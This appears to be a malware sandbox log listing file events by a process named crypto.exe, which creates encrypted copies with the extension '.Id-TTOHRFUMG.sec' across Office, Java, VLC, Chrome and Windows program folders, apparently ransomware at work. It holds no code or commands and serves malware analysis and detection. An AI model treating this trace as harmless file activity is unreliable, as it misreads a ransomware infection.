File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01149_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OUTLVBS.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\service.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotslightoverlay.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGTOC.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\redStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Sts.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libkaraoke_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00141_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00095_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\BHOINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\jvm.lib.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\CONFLICT.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\timeZones.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR49F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\jce.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Los_Angeles.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MAPISHELLR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK.DEV_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL054.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\nss3.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\reflect.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCHDRESN.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_TexturedBlue.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00392_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\OFFICE10.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04206_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ug.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Flash.mpp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ta.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\jawt.lib.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-views.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Boa_Vista.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\vdk150.dll	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\720x480icongraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jpeg.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00174_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301052.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Beulah.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-12.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-windows.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_vc1_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libaribcam_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\2.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ndjamena.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Indian\Kerguelen.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Wake.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Photo Viewer\PhotoBase.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_flyout.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\14.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Zaporozhye.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02755U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libuleaddvaudio_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\clock.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\adodb.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\NavigationButtonSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Scoresbysund.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\SystemV\PST8PDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GRINTL32.DLL.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\WINWORD_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\7-zip.chm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.IE.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CLVIEW.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0102762.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\GKExcel.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\localizedStrings.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CUPINST.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_specialocc_Thumbnail.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Galapagos.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Perspective.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIconMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\REMINDER.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21344_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\INFOPATH.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR39F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ACCWIZ.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OMSINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR12F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR6B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\WORDICON.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\8.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-utility-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Cocos.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0103262.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\bg.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Inuvik.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02252_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01300_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME04.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)greenStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.p2.ui.overridden_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107152.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB3A.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationRight_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR7F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_ja.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\en-US\WMPDMC.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveDrop32x32.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14691_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04225_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285808.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PSRCHLEX.DAT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME48.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\DADSHIRT.HTM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\unpack200.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03331_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18247_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\SEAMARBL.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_floating.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\glib-lite.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03011U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196358.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\CLVWINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\DELETE.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL107.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Comments.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\whiteband.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00231_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301418.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\1.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_ur.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME03.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_underline.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIDEBARBB.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\on_desktop\slideshow_glass_frame.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jawt.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\WANS.NET.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libcache_read_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_bottom.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Concourse.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OIMG.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libfolder_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-charts.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_off.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Groove.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\MAIL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SCANPST.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\EquityResume.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libmono_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\hu.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\DVDMaker.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Fiji.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01064_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14985_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-middle.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Monterrey.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OUTLPH.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\favicon.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\ktab.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down_BIDI.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21333_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02088_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199307.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01421_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Adjacency.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGBOXES.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_srt_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\WMPNSSUI.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdate.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tahiti.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099146.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Atlantic\Faroe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jfr.dll.Id-TTOHRFUMG.sec	crypto.exe
